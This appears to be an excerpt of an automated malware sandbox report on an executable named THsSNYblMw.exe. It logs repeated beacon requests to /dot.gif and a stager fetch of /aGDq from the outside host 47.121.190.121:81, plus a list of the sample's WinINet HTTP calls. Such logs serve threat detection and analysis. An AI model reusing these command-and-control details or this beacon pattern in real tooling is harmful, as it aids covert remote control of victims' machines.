Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121
Source: unknown	TCP traffic detected without corresponding DNS query: 47.121.190.121

Source: C:\Users\user\Desktop\THsSNYblMw.exe

Code function: 0_2_006AE3A4 _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle,

0_2_006AE3A4

Source: global traffic	HTTP traffic detected: GET /aGDq HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; Avant Browser)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
